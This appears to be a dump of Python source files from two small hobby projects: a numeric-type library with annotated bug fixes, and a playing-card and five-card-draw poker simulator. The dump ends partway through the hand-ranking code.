        return hash(("Imaginary", self.value))

    @property
    def value(self):
        # (Fixed: the original body was `pass`, so the coefficient was
        # unreachable and __hash__ always hashed None.)
        return self.__value

    @property
    def real(self):
        # A pure imaginary number has no real part.
        return None

    @property
    def imaginary(self):
        return self


IMAGINARY_ZERO = Imaginary(REAL_ZERO)
IMAGINARY_ONE = Imaginary(REAL_ONE)
I = IMAGINARY_ONE
--- FILE SEPARATOR ---
from Engine.Number import Skeleton, Number, NUMBER_ZERO, NUMBER_ONE
from Engine.Number.Natural import Natural
class Integer(Skeleton):
    """Arbitrary-sign integer wrapping a Number that must be integral."""

    __value: Number

    def __init__(self, value: Number):
        assert self.__is_valid_value(value)
        self.__value = value

    def __hash__(self):
        return hash(("Integer", self.value))

    def __str__(self):
        return f"{self.value}"

    @classmethod
    def __is_valid_value(cls, value: Number) -> bool:
        # Only integral Numbers are admissible.
        return value.is_integer

    @classmethod
    def from_string(cls, string: str) -> "Integer":
        return cls(Number.from_string(string))

    @classmethod
    def from_python_integer(cls, python_integer: int) -> "Integer":
        return cls(Number.from_python_integer(python_integer))

    @classmethod
    def from_number(cls, number: Number) -> "Integer":
        return cls(number)

    @classmethod
    def from_natural(cls, natural: Natural) -> "Integer":
        return cls(natural.value)

    @property
    def value(self) -> Number:
        return self.__value

    @property
    def real(self) -> "Integer":
        return self

    @property
    def imaginary(self):
        return None

    @property
    def is_integer(self) -> bool:
        return True

    @property
    def is_fractional(self) -> bool:
        return False

    def equal(self, other: "Integer") -> bool:
        return self.value == other.value

    def lower(self, other: "Integer") -> bool:
        return self.value < other.value

    def greater(self, other: "Integer") -> bool:
        return self.value > other.value

    def lower_equal(self, other: "Integer") -> bool:
        return self.value <= other.value

    def greater_equal(self, other: "Integer") -> bool:
        return self.value >= other.value

    def absolute(self) -> "Integer":
        return Integer(
            abs(self.value)
        )

    # (Fixed: add/subtract/multiply/power wrapped their results in Natural,
    # whose constructor rejects negative values -- integer arithmetic must
    # stay closed under Integer.)
    def add(self, other: "Integer") -> "Integer":
        return Integer(
            self.value + other.value
        )

    def negate(self) -> "Integer":
        # (Fixed: the original `def negate(self): "Integer":` was a
        # syntax error that prevented this module from being imported.)
        return Integer(
            -self.value
        )

    def subtract(self, other: "Integer") -> "Integer":
        return Integer(
            self.value - other.value
        )

    def multiply(self, other: "Integer") -> "Integer":
        return Integer(
            self.value * other.value
        )

    def power(self, other: "Integer") -> "Integer":
        # Negative exponents would leave the integers.
        # (Fixed: `other >= 0` compared an Integer to a Python int; compare
        # the wrapped Number against NUMBER_ZERO as Natural validation does.)
        assert other.value >= NUMBER_ZERO
        return Integer(
            self.value ** other.value
        )

    def divide(self, other: "Integer") -> "Integer":
        # NOTE(review): true division of integers is not closed -- the
        # constructor will reject non-integral results; confirm whether this
        # should delegate to Rational instead.
        return Integer(
            self.value / other.value
        )

    def floor_divide(self, other: "Integer") -> "Integer":
        return Integer(
            self.value // other.value
        )

    def modulus(self, other: "Integer") -> "Integer":
        return Integer(
            self.value % other.value
        )


INTEGER_ZERO = Integer(NUMBER_ZERO)
INTEGER_ONE = Integer(NUMBER_ONE)
--- FILE SEPARATOR ---
from Engine.Number import Skeleton
class Irrational(Skeleton):
    """Irrational number represented lazily by a generator callable."""

    # __generator: Function

    def __init__(self, generator):
        self.__generator = generator

    def __hash__(self):
        # (Fixed: hash() takes a single argument; the original passed two,
        # which raised TypeError -- hash the tuple instead, matching the
        # other Engine.Number classes.)
        return hash(("Irrational", self.generator))

    # def __str__(self):
    #     return f"{self.compute()}..."

    @property
    def generator(self):
        return self.__generator

    @property
    def real(self):
        return self

    @property
    def imaginary(self):
        return None


IRRATIONAL_ZERO = Irrational(lambda: 0)
IRRATIONAL_ONE = Irrational(lambda: 1)
--- FILE SEPARATOR ---
from Engine.Algorithm import natural_modulus
from Engine.Number import Skeleton, Number, NUMBER_ZERO, NUMBER_ONE
class Natural(Skeleton):
    """Natural number (non-negative integer) wrapping a Number."""

    __value: Number

    def __init__(self, value: Number):
        assert self.__is_valid_value(value)
        self.__value = value

    def __hash__(self):
        return hash(("Natural", self.value))

    def __str__(self) -> str:
        # (Fixed: the original referenced a bare `value`, raising NameError.)
        return f"{self.value}"

    @classmethod
    def __is_valid_value(cls, value: Number) -> bool:
        # Naturals must be integral and non-negative.
        return value.is_integer and value >= NUMBER_ZERO

    @classmethod
    def from_string(cls, string: str) -> "Natural":
        return cls(Number.from_string(string))

    @classmethod
    def from_python_integer(cls, python_integer: int) -> "Natural":
        return cls(Number.from_python_integer(python_integer))

    @classmethod
    def from_number(cls, number: Number) -> "Natural":
        return cls(number)

    @property
    def value(self) -> "Number":
        return self.__value

    @property
    def real(self) -> "Natural":
        return self

    @property
    def imaginary(self):
        return None

    @property
    def is_integer(self) -> bool:
        return True

    @property
    def is_fractional(self) -> bool:
        return False

    def equal(self, other: "Natural") -> bool:
        return self.value == other.value

    def lower(self, other: "Natural") -> bool:
        return self.value < other.value

    def greater(self, other: "Natural") -> bool:
        return self.value > other.value

    def lower_equal(self, other: "Natural") -> bool:
        return self.value <= other.value

    def greater_equal(self, other: "Natural") -> bool:
        return self.value >= other.value

    def absolute(self) -> "Natural":
        return self

    def add(self, other: "Natural") -> "Natural":
        return Natural(
            self.value + other.value
        )

    def subtract(self, other: "Natural") -> "Natural":
        # NOTE(review): naturals are not closed under subtraction; a negative
        # result fails the constructor's validity assert -- confirm intent.
        return Natural(
            self.value - other.value
        )

    def multiply(self, other: "Natural") -> "Natural":
        return Natural(
            self.value * other.value
        )

    # TODO: Implement Efficient Exponentiation
    def power(self, other: "Natural") -> "Natural":
        return Natural(
            self.value ** other.value
        )

    def divide(self, other: "Natural") -> "Natural":
        # NOTE(review): true division can yield a non-integral Number, which
        # the constructor rejects -- confirm whether floor_divide was meant.
        return Natural(
            self.value / other.value
        )

    def floor_divide(self, other: "Natural") -> "Natural":
        return Natural(
            self.value // other.value
        )

    def modulus(self, other: "Natural") -> "Natural":
        return Natural(
            self.value % other.value
        )


NATURAL_ZERO = Natural(NUMBER_ZERO)
NATURAL_ONE = Natural(NUMBER_ONE)
--- FILE SEPARATOR ---
from Engine.Number import Skeleton, Number
from Engine.Number.Natural import Natural
from Engine.Number.Integer import Integer, INTEGER_ZERO, INTEGER_ONE
class Rational(Skeleton):
    """A rational number stored as a ratio of two Integers.

    Fixes over the previous version, which had been copy-pasted from the
    Integer module: a duplicated @classmethod decorator and two malformed
    signatures made the file unparseable, every arithmetic/comparison method
    referenced a nonexistent ``self.value``, results were wrapped in Natural,
    and the annotations still said "Integer". All operations now work on
    numerator/denominator via Integer arithmetic.
    """
    __numerator: Integer
    __denominator: Integer

    def __init__(self, numerator: Integer, denominator: Integer):
        # A zero denominator is never a valid rational.
        assert denominator != INTEGER_ZERO
        self.__numerator = numerator
        self.__denominator = denominator

    def __hash__(self):
        return hash(("Rational", self.numerator, self.denominator))

    def __str__(self) -> str:
        return f"{self.numerator}/{self.denominator}"

    @classmethod
    def from_string(cls, string: str) -> "Rational":
        """Parse an integer string as a rational with denominator one."""
        return cls(Integer.from_string(string), INTEGER_ONE)

    @classmethod
    def from_python_integer(cls, python_integer: int) -> "Rational":
        return cls(Integer.from_python_integer(python_integer), INTEGER_ONE)

    @classmethod
    def from_number(cls, number: Number) -> "Rational":
        return cls(Integer.from_number(number), INTEGER_ONE)

    @classmethod
    def from_natural(cls, natural: Natural) -> "Rational":
        return cls(Integer.from_natural(natural), INTEGER_ONE)

    @classmethod
    def from_integer(cls, integer: Integer) -> "Rational":
        return cls(integer, INTEGER_ONE)

    @property
    def numerator(self) -> "Integer":
        return self.__numerator

    @property
    def denominator(self) -> "Integer":
        return self.__denominator

    @property
    def real(self) -> "Rational":
        return self

    @property
    def imaginary(self):
        return None

    # TODO: reduce to lowest terms once an Integer gcd/modulus is available.
    def reduce(self) -> "Rational":
        pass

    def __signs_match(self, other: "Rational") -> bool:
        # True when both denominators share a sign, i.e. cross-multiplying
        # both sides of a comparison preserves its direction.
        return (self.denominator < INTEGER_ZERO) == (other.denominator < INTEGER_ZERO)

    def equal(self, other: "Rational") -> bool:
        # a/b == c/d  <=>  a*d == c*b
        return self.numerator * other.denominator == other.numerator * self.denominator

    def lower(self, other: "Rational") -> bool:
        # Cross-multiply; flip the direction when the denominator product
        # is negative.
        left = self.numerator * other.denominator
        right = other.numerator * self.denominator
        if self.__signs_match(other):
            return left < right
        return right < left

    def greater(self, other: "Rational") -> bool:
        return other.lower(self)

    def lower_equal(self, other: "Rational") -> bool:
        return not other.lower(self)

    def greater_equal(self, other: "Rational") -> bool:
        return not self.lower(other)

    def absolute(self) -> "Rational":
        return Rational(abs(self.numerator), abs(self.denominator))

    def add(self, other: "Rational") -> "Rational":
        # a/b + c/d = (a*d + c*b) / (b*d)
        return Rational(
            self.numerator * other.denominator + other.numerator * self.denominator,
            self.denominator * other.denominator
        )

    def negate(self) -> "Rational":
        return Rational(-self.numerator, self.denominator)

    def subtract(self, other: "Rational") -> "Rational":
        return self.add(other.negate())

    def multiply(self, other: "Rational") -> "Rational":
        return Rational(
            self.numerator * other.numerator,
            self.denominator * other.denominator
        )

    # TODO: support non-integral exponents.
    def power(self, other: "Rational") -> "Rational":
        """Raise to an integral power (exponent denominator must be one)."""
        assert other.denominator == INTEGER_ONE
        return Rational(
            self.numerator ** other.numerator,
            self.denominator ** other.numerator
        )

    def divide(self, other: "Rational") -> "Rational":
        # a/b / (c/d) = (a*d) / (b*c); division by zero is rejected here.
        assert other.numerator != INTEGER_ZERO
        return Rational(
            self.numerator * other.denominator,
            self.denominator * other.numerator
        )
# Shared singletons: 0/1 and 1/1.
RATIONAL_ZERO = Rational(INTEGER_ZERO, INTEGER_ONE)
RATIONAL_ONE = Rational(INTEGER_ONE, INTEGER_ONE)
--- FILE SEPARATOR ---
from Engine.Number import Skeleton
from Engine.Number.Rational import Rational, RATIONAL_ZERO, RATIONAL_ONE
from Engine.Number.Irrational import Irrational, IRRATIONAL_ZERO
class Real(Skeleton):
    """A real number: the sum of a rational part and an irrational part."""
    __rational: Rational
    __irrational: Irrational

    def __init__(self, rational: Rational = None, irrational: Irrational = None):
        # At least one part must be provided; the other may stay None.
        # The old chained assert (`rational != irrational != None`) sent the
        # `!= None` comparison through Skeleton.upgrade(None), which raised
        # even for the valid call Real(RATIONAL_ZERO).
        assert rational is not None or irrational is not None
        # NOTE(review): the from_* constructors fill the missing part with a
        # ZERO singleton while direct construction leaves it as None —
        # confirm whether the two representations should be normalized.
        self.__rational = rational
        self.__irrational = irrational

    def __hash__(self):
        return hash(("Real", self.rational, self.irrational))

    # def __str__(self):
    #     return f"{self.compute()}"

    @classmethod
    def from_string(cls, string):
        """Build from an integer string; the irrational part is zero."""
        return cls(Rational.from_string(string), IRRATIONAL_ZERO)

    @classmethod
    def from_python_integer(cls, python_integer):
        return cls(Rational.from_python_integer(python_integer), IRRATIONAL_ZERO)

    @classmethod
    def from_number(cls, number):
        return cls(Rational.from_number(number), IRRATIONAL_ZERO)

    @classmethod
    def from_natural(cls, natural):
        return cls(Rational.from_natural(natural), IRRATIONAL_ZERO)

    @classmethod
    def from_integer(cls, integer):
        return cls(Rational.from_integer(integer), IRRATIONAL_ZERO)

    @classmethod
    def from_rational(cls, rational):
        return cls(rational, IRRATIONAL_ZERO)

    @classmethod
    def from_irrational(cls, irrational):
        return cls(RATIONAL_ZERO, irrational)

    @property
    def rational(self):
        # The rational component (may be None when only an irrational part
        # was supplied).
        return self.__rational

    @property
    def irrational(self):
        # The irrational component (may be None when only a rational part
        # was supplied).
        return self.__irrational

    @property
    def real(self):
        return self

    @property
    def imaginary(self):
        return None
# Shared singletons with a purely rational part.
# NOTE(review): with Real.__init__'s chained assert as written, constructing
# with only a rational argument appears to raise — confirm these can be built.
REAL_ZERO = Real(RATIONAL_ZERO)
REAL_ONE = Real(RATIONAL_ONE)
--- FILE SEPARATOR ---
from Engine.Algorithm.Division import number_division, number_floor_division
from Engine.Number.Operation import N
from abc import ABC, abstractmethod, abstractproperty, abstractclassmethod
# Default precision accepted by Number.invert (currently not forwarded to
# the division routine — see invert).
DEFAULT_PRECISION = 15
# Presumably the default number of Taylor-series terms used by the
# operation routines elsewhere — confirm against Engine.Number.Operation.
DEFAULT_PRECISION_TAYLOR_POLYNOMIAL = 5
class Skeleton(ABC):
    """Abstract base that wires Python's operator protocol to named hooks.

    Concrete subclasses implement equal/lower/greater/add/...; each dunder
    first coerces a foreign operand into the subclass's own type via
    upgrade(), then delegates to the named hook.
    """

    def __coerce(self, other):
        # Promote a mismatched operand type to this instance's type.
        if type(other) is not type(self):
            other = self.upgrade(other)
        return other

    def __eq__(self, other):
        return self.equal(self.__coerce(other))

    def __ne__(self, other):
        return not self.equal(self.__coerce(other))

    def __lt__(self, other):
        return self.lower(self.__coerce(other))

    def __gt__(self, other):
        return self.greater(self.__coerce(other))

    def __le__(self, other):
        return self.lower_equal(self.__coerce(other))

    def __ge__(self, other):
        return self.greater_equal(self.__coerce(other))

    def __abs__(self):
        return self.absolute()

    def __add__(self, other):
        return self.add(self.__coerce(other))

    def __neg__(self):
        return self.negate()

    def __sub__(self, other):
        return self.subtract(self.__coerce(other))

    def __mul__(self, other):
        return self.multiply(self.__coerce(other))

    def __pow__(self, other):
        return self.power(self.__coerce(other))

    def __truediv__(self, other):
        return self.divide(self.__coerce(other))

    def __floordiv__(self, other):
        return self.floor_divide(self.__coerce(other))

    def __mod__(self, other):
        return self.modulus(self.__coerce(other))

    @classmethod
    def upgrade(cls, other):
        """Convert *other* into an instance of *cls* via its from_* hook.

        Fixes: the previous implementation built the whole dispatch dict
        eagerly with attribute access (cls.from_rational, ...), which raised
        AttributeError for any subclass missing even one converter, and then
        hid every failure behind a bare `except: raise Exception`.
        """
        # Imported lazily to avoid circular imports between number modules.
        from Engine.Number.Natural import Natural
        from Engine.Number.Integer import Integer
        from Engine.Number.Rational import Rational
        from Engine.Number.Irrational import Irrational
        from Engine.Number.Real import Real
        from Engine.Number.Imaginary import Imaginary
        if type(other) is cls:
            return other
        converter_names = {
            str: "from_string",
            int: "from_python_integer",
            Number: "from_number",
            Natural: "from_natural",
            Integer: "from_integer",
            Rational: "from_rational",
            Irrational: "from_irrational",
            Real: "from_real",
            Imaginary: "from_imaginary",
        }
        name = converter_names.get(type(other))
        # Look the converter up lazily, so a subclass only needs the hooks
        # that are actually exercised.
        converter = getattr(cls, name, None) if name is not None else None
        if converter is None:
            raise TypeError(
                f"cannot upgrade {type(other).__name__} to {cls.__name__}"
            )
        return converter(other)

    @property
    @abstractmethod
    def real(self):
        """The real component of this value."""
        raise NotImplementedError

    @property
    @abstractmethod
    def imaginary(self):
        """The imaginary component, or None for purely real types."""
        raise NotImplementedError
class Number(Skeleton):
    """A decimal floating-point value: mantissa * 10 ** exponent."""
    __mantissa: int
    __exponent: int

    def __init__(self, mantissa: int, exponent: int):
        self.__mantissa = mantissa
        self.__exponent = exponent

    def __hash__(self):
        # Hash the reduced form so equal values share a hash.
        x = self.reduce()
        return hash(("Number", x.mantissa, x.exponent))

    def __str__(self) -> str:
        return f"{self.mantissa}e{self.exponent}"

    @classmethod
    def from_string(cls, string: str) -> "Number":
        """Parse 'MeE' scientific notation, 'I.F' decimals, or plain integers.

        Fixes: the old parser derived the decimal exponent from the digit
        count of int(fraction), so leading zeros vanished ('1.05' parsed as
        10.5); it also rejected plain integer strings outright.
        """
        if "e" in string:
            mantissa, exponent = string.split("e")
            return cls(int(mantissa), int(exponent))
        if "." in string:
            _, fraction = string.split(".")
            # len() of the raw fraction text keeps leading zeros in the count.
            return cls(int(string.replace(".", "")), -len(fraction))
        return cls(int(string), 0)

    @classmethod
    def from_python_integer(cls, python_integer: int) -> "Number":
        """Wrap a Python int as a Number with exponent zero."""
        return cls(python_integer, 0)

    @property
    def mantissa(self) -> int:
        return self.__mantissa

    @property
    def exponent(self) -> int:
        return self.__exponent

    @property
    def real(self) -> "Number":
        return self

    @property
    def imaginary(self):
        return None

    @property
    def is_integer(self) -> bool:
        # Integral iff no digits remain right of the decimal point.
        return self.reduce().exponent >= 0

    @property
    def is_fractional(self) -> bool:
        return not self.is_integer

    def reduce(self) -> "Number":
        """Canonical form: move the mantissa's trailing zeros into the exponent.

        Fixes: the old version reduced abs(mantissa) and silently dropped the
        sign (Number(-5, 0) reduced to Number(5, 0)), and it left zero's
        exponent intact so 0e5 compared unequal to 0e0.
        """
        if self.mantissa == 0:
            return Number(0, 0)
        mantissa = self.mantissa
        exponent = self.exponent
        while mantissa % 10 == 0:
            mantissa //= 10
            exponent += 1
        return Number(mantissa, exponent)

    def equal(self, other: "Number") -> bool:
        x = self.reduce()
        y = other.reduce()
        return x.mantissa == y.mantissa and x.exponent == y.exponent

    def lower(self, other: "Number") -> bool:
        x = self.reduce()
        y = other.reduce()
        # Rescale both mantissas to the smaller exponent before comparing.
        minimum_exponent = min(x.exponent, y.exponent)
        x_mantissa = x.mantissa * pow(10, x.exponent - minimum_exponent)
        y_mantissa = y.mantissa * pow(10, y.exponent - minimum_exponent)
        return x_mantissa < y_mantissa

    def greater(self, other: "Number") -> bool:
        return not self.equal(other) and not self.lower(other)

    def lower_equal(self, other: "Number") -> bool:
        return self.equal(other) or self.lower(other)

    def greater_equal(self, other: "Number") -> bool:
        return self.equal(other) or self.greater(other)

    def absolute(self) -> "Number":
        return Number(
            abs(self.mantissa),
            self.exponent
        )

    def add(self, other: "Number") -> "Number":
        # Align both operands on the smaller exponent, then add mantissas.
        minimum_exponent = min(self.exponent, other.exponent)
        return Number(
            (self.mantissa * pow(10, self.exponent - minimum_exponent)) +
            (other.mantissa * pow(10, other.exponent - minimum_exponent)),
            minimum_exponent
        )

    def negate(self) -> "Number":
        return Number(
            -self.mantissa,
            self.exponent
        )

    def subtract(self, other: "Number") -> "Number":
        return self.add(other.negate())

    def multiply(self, other: "Number") -> "Number":
        return Number(
            self.mantissa * other.mantissa,
            self.exponent + other.exponent
        )

    # TODO: Implement efficient exponentiation
    def power(self, other: "Number") -> "Number":
        """Raise to a non-negative integral power.

        NOTE(review): this uses other.mantissa directly as the exponent; for
        an integral operand whose reduced exponent is > 0 (e.g. 2e1) the
        intended power is mantissa * 10**exponent — confirm inputs are
        pre-normalized.
        """
        assert other.is_integer and other >= NUMBER_ZERO
        return Number(
            self.mantissa ** other.mantissa,
            self.exponent * other.mantissa
        )

    def invert(self, n: int = DEFAULT_PRECISION) -> "Number":
        """Return the reciprocal 1/self.

        NOTE(review): *n* is accepted but never forwarded to number_division —
        confirm whether that routine takes a precision argument.
        """
        if self == NUMBER_ZERO:
            raise ZeroDivisionError
        return number_division(NUMBER_ONE, self)

    def divide(self, other: "Number") -> "Number":
        if other == NUMBER_ZERO:
            raise ZeroDivisionError
        return number_division(self, other)

    def floor_divide(self, other: "Number") -> "Number":
        if other == NUMBER_ZERO:
            raise ZeroDivisionError
        return number_floor_division(self, other)

    def modulus(self, other: "Number") -> "Number":
        """Remainder for non-negative integral operands."""
        assert self.is_integer and self >= NUMBER_ZERO
        assert other.is_integer and other >= NUMBER_ZERO
        if other == NUMBER_ZERO:
            raise ZeroDivisionError
        return self - (other * self.floor_divide(other))
# Shared singletons for the additive and multiplicative identities.
NUMBER_ZERO = Number(0, 0)
NUMBER_ONE = Number(1, 0)
--- FILE SEPARATOR ---
# NOTE(review): these imported names don't match the package layout shown
# elsewhere (the number module defines Number/NUMBER_ZERO/NUMBER_ONE, and the
# project file list has no Engine/Number/Number.py) — this import likely
# fails; confirm the intended module and names.
from Engine.Number.Number import Numeric, NUMERIC_ZERO, NUMERIC_ONE, Complex
from Engine.Number.Operation import factorial, sin, cos
# Smoke-test a few operations on the numeric tower.
x = NUMERIC_ONE
print(factorial(1))
print(sin(x))
print(cos(x))
|
[
"/Engine/Algorithm/Division.py",
"/Engine/Algorithm/Operation.py",
"/Engine/Number/Complex.py",
"/Engine/Number/Imaginary.py",
"/Engine/Number/Integer.py",
"/Engine/Number/Irrational.py",
"/Engine/Number/Natural.py",
"/Engine/Number/Rational.py",
"/Engine/Number/Real.py",
"/Engine/Number/__init__.py",
"/main.py"
] |
00116/PyPlayingCards
|
import random
# A playing card: comparison number, suit, and display string.
# allnumber 0-51 covers the four suits of 1-13; 52 and above are jokers.
# Numbers run 1-13 and suits 1-4 (spade, heart, diamond, club in order);
# jokers use 0 for both number and suit.
# With ace14/two15 set, aces/twos get comparison value 14/15 instead.
class Card:
    # Display names indexed by suit; index 0 is unused (jokers never get here).
    _SUIT_NAMES = (None, 'spade', 'heart', 'diamond', 'club')

    def __init__(self, allnumber, ace14=False, two15=False):
        if allnumber >= 52:
            self.number = 0
            self.suit = 0
            self.str = 'joker'
        else:
            self.number = allnumber % 13 + 1
            self.suit = allnumber // 13 + 1
            # Fixed: the old if/elif chain spelled diamond as 'daimond'.
            self.str = self._SUIT_NAMES[self.suit] + ' ' + str(self.number)
        # Promote ace/two after the display string is built, so the string
        # keeps the printed face value while the comparison value changes.
        if ace14 and self.number == 1:
            self.number = 14
        elif two15 and self.number == 2:
            self.number = 15
# Owns the full card list, the deck, the community cards, and the discard
# pile; handles shuffling, deck initialization, and recycling discards.
class Table:
    def __init__(self, number_of_cards, ace14=False, two15=False):
        # Master list of every card in play; the deck is dealt from a copy.
        self.card = [Card(i, ace14, two15) for i in range(number_of_cards)]
        self.deck = []
        self.community = []
        self.discard = []

    def shuffle(self):
        """Shuffle the deck in place.

        (The old version first rebound self.deck to a copy of itself — a
        pointless self-copy, removed here.)
        """
        random.shuffle(self.deck)

    def deck_initialize(self):
        """Reset the deck to a shuffled copy of the full card list."""
        self.deck = list(self.card)
        random.shuffle(self.deck)

    def discard_return_deck(self):
        """Return the discard pile to the deck and shuffle."""
        self.deck.extend(self.discard)
        self.discard = []
        self.shuffle()
'''
class Player:
def __init__(self):
self.hand = []
self.name = ''
self.fivedraw = poker_select.FivecardSelect()
def number_sort(self, reverse = False):
if reverse:
self.hand.sort(reverse = True, key = lambda h: h.number)
else:
self.hand.sort(key = lambda h: h.number)
def suit_sort(self):
self.hand.sort(key = lambda h: h.suit)
def draw(self, deck):
draw_card = deck[0]
self.hand.append(deck[0])
del deck[0]
return draw_card
def throw(self, throw_number, discard):
throw_card = self.hand[throw_number]
discard.append(self.hand[throw_number])
del self.hand[throw_number]
return throw_card
def five_card_draw_throw(self, deck, discard):
throw_num = self.fivedraw.throw_card_choice(self.hand)
throw_cards = []
draw_cards = []
for i in throw_num:
throw_cards.append(self.throw(i, discard))
draw_cards.append(self.draw(deck))
return throw_cards, draw_cards
#def five_card_draw_throw_algorithm(self, discard):
# # 捨てるカードの選択を行う
# # 今は5番目のカードを選択
# throw_card = []
# fixed_hand, rank, rank_str, card_power = poker_system.poker_rank(self.hand)
# self.hand = fixed_hand
# # ストレート以上確定で何も切らない
# if rank > 3:
# return []
# # スリーカードのときは他の2枚を切る
# elif rank == 3:
# for i in range(2):
# throw_card.append(self.throw(3, discard))
# return throw_card
# # ツーペアのときは残り1枚を切る
# elif rank == 2:
# throw_card.append(self.throw(4, discard))
# return throw_card
# # ワンペアのときは残り3枚を切る
# elif rank == 1:
# for i in range(3):
# throw_card.append(self.throw(2, discard))
# return throw_card
# # ブタのときはランダムに1~5枚、数字の小さい物から順に捨てる
# else:
# random_number = random.randint(1, 5)
# for i in range(random_number):
# throw_card.append(self.throw(5 - random_number, discard))
# return throw_card
#throw_card_number = 4
#throw_card = self.throw(throw_card_number)
#return throw_card
'''
--- FILE SEPARATOR ---
import cards_system
import player
import poker_winner
# Drives a game of five-card draw poker.
class FiveCardDraw:
    # Expected ranges: number_of_players 1-9, number_of_cards >= 52, turns >= 1.
    def __init__(self, number_of_players=8, number_of_cards=53, turns=1):
        self.number_of_players = number_of_players
        self.number_of_cards = number_of_cards
        self.turns = turns
        self.table = cards_system.Table(self.number_of_cards, ace14=True)
        self.winner = poker_winner.PokerWinner()
        self.player = []
        for seat in range(self.number_of_players):
            p = player.Player()
            self.player.append(p)
            p.name = 'player' + str(seat + 1)

    # Start-of-game setup: fresh deck, five cards each.
    def deal(self):
        self.table.deck_initialize()
        for p in self.player:
            for _ in range(5):
                p.draw(self.table.deck)

    # One full turn: every player discards and redraws once.
    def one_turn(self):
        for p in self.player:
            # Recycle the discard pile when the deck drops below ten cards.
            if len(self.table.deck) < 10:
                self.table.discard_return_deck()
            print(p.name)
            p.number_sort(reverse=True)
            print([card.str for card in p.hand])
            # Pick discards, then draw replacements.
            thrown, drawn = p.five_card_draw_throw(self.table.deck, self.table.discard)
            print('throw in ', end='')
            print([card.str for card in thrown])
            print('draw ', end='')
            print([card.str for card in drawn])

    # Run the whole game and announce the winner.
    def game(self):
        rank = [''] * self.number_of_players
        cardpower = [0] * self.number_of_players
        self.deal()
        for turn in range(self.turns):
            self.one_turn()
            # After the final turn, evaluate every hand.
            if turn == self.turns - 1:
                for seat, p in enumerate(self.player):
                    rank[seat], cardpower[seat] = p.poker_rank()
                    print(p.name + ' ' + rank[seat])
                    print([card.str for card in p.hand])
        print('winner ' + self.player[self.winner.poker_winner(cardpower)].name)
'''
class TexasHoldem:
def __init__(self):
self.number_of_players = 4
self.number_of_cards = 52
self.turns = 50
self.player = []
for i in range(self.number_of_players):
self.player.append(cards.Player())
self.player[i].name = 'player' + str(i + 1)
self.table = cards.Table(self.number_of_cards)
def deal(self):
self.table.shuffle()
for i in range(2):
for j in range(self.number_of_players):
self.player[j].draw(self.table.deck)
self.table.community.extend(self.table.deck[0:3])
del self.table.deck[0:3]
def one_turn(self):
for i in range(self.number_of_players + 1):
if len(self.table.deck) < self.number_of_players:
self.table.deck.extend(self.table.discard)
self.table.discard = []
random.shuffle(self.table.deck)
self.table.community.append(self.table.deck[0])
del self.table.deck[0]
for i in range(self.number_of_players + 1):
print(self.player[i].name)
self.player[i].sort_cards()
print([self.player[i].hand[j].str for j in range(len(self.player[i].hand))])
drawcard = self.player[i].draw(self.table.deck)
print('draw ', end='')
print([drawcard[j].str for j in range(len(drawcard))])
def game(self):
self.deal()
rank = [0] * self.number_of_players
rank_str = [0] * self.number_of_players
cardpower = [0] * self.number_of_players
for i in range(self.turns):
self.one_turn()
if i == self.turns - 1:
for i in range(self.number_of_players):
self.player[i].hand, rank[i], rank_str[i], cardpower[i] = rule.poker_rank(self.player[i].hand)
winner, judge = rule.poker_winner(rank, cardpower)
for i in range(self.number_of_players):
print(self.player[i].name + ' ' + rank_str[i])
print([self.player[i].hand[j].str for j in range(len(self.player[i].hand))])
if len(judge):
print('card power judge')
print(judge)
for i in winner:
print('winner ' + self.player[i].name)
'''
--- FILE SEPARATOR ---
import games

# Entry point: play a single game of five-card draw poker.
game = games.FiveCardDraw()
game.game()
--- FILE SEPARATOR ---
import poker_rank
import random
# Chooses which cards to discard in five-card draw poker.
class FiveCardChoice:
    def throw_card_choice(self, hand):
        """Return (rank-sorted hand, list of discard indices).

        The indices assume sequential removal from the sorted hand, so a
        repeated index (e.g. [3, 3]) discards consecutive cards.
        """
        evaluator = poker_rank.PokerRank()
        rank_str, cardpower = evaluator.poker_rank(hand)
        hand = evaluator.rank_sort(hand, cardpower)
        strength = cardpower[0]
        if strength > 3:
            # Straight or better: keep everything.
            throw_card = []
        elif strength == 3:
            # Three of a kind: discard the other two cards.
            throw_card = [3, 3]
        elif strength == 2:
            # Two pair: discard the one remaining card.
            throw_card = [4]
        elif strength == 1:
            # One pair: discard the other three cards.
            throw_card = [2, 2, 2]
        else:
            # High card: discard 1-5 of the lowest cards, count chosen at random.
            count = random.randint(1, 5)
            throw_card = [5 - count] * count
        return hand, throw_card
# Holds a hand and a player name; provides sorting, drawing, discarding,
# and hand-rank lookup.
class Player:
    def __init__(self):
        self.hand = []
        self.name = ''
        self.fivedraw = FiveCardChoice()
        self.prank = poker_rank.PokerRank()

    def number_sort(self, reverse=False):
        """Sort the hand by card number, ascending by default."""
        self.hand.sort(key=lambda card: card.number, reverse=reverse)

    def suit_sort(self):
        """Sort the hand by suit."""
        self.hand.sort(key=lambda card: card.suit)

    def draw(self, deck):
        """Move the top card of *deck* into the hand and return it."""
        card = deck.pop(0)
        self.hand.append(card)
        return card

    def throw(self, throw_number, discard):
        """Move hand[throw_number] onto *discard* and return it."""
        card = self.hand.pop(throw_number)
        discard.append(card)
        return card

    def five_card_draw_throw(self, deck, discard):
        """Run one discard-and-redraw step; return (thrown, drawn) cards."""
        self.hand, indices = self.fivedraw.throw_card_choice(self.hand)
        thrown = []
        drawn = []
        for idx in indices:
            thrown.append(self.throw(idx, discard))
            drawn.append(self.draw(deck))
        return thrown, drawn

    def poker_rank(self):
        """Evaluate the hand; sorts it by rank and returns (rank, cardpower)."""
        rank, cardpower = self.prank.poker_rank(self.hand)
        self.hand = self.prank.rank_sort(self.hand, cardpower)
        return rank, cardpower
#throw_card_number = 4
#throw_card = self.throw(throw_card_number)
--- FILE SEPARATOR ---
#from operator import attrgetter
#import itertools
# Judges poker hands and sorts a hand according to its rank.
class PokerRank:
    # Judge the rank of a hand (only 5-card hands are supported).
    def poker_rank(self, hand):
        flush = False
        straight = False
        # rank is the display string for the hand.
        # cardpower[0] is the hand strength; the remaining entries break ties
        # between hands of the same rank.
        rank = ''
        cardpower = []
        # Count of each card number (index 0 counts jokers) and each suit.
        numlist = [0 for i in range(15)]
        suitlist = [0 for i in range(5)]
        len_numlist = len(numlist)
        # Kept for eventually handling hands of 4 or fewer cards (unimplemented).
        len_hand = len(hand)
        for i in range(len_hand):
            numlist[hand[i].number] += 1
            suitlist[hand[i].suit] += 1
        # Flush check: jokers (suit 0) count toward any suit.
        if max(suitlist) + suitlist[0] == 5:
            flush = True
        straight_numlist = list(numlist)
        # Straight check: jokers in slot 0 may substitute for missing numbers.
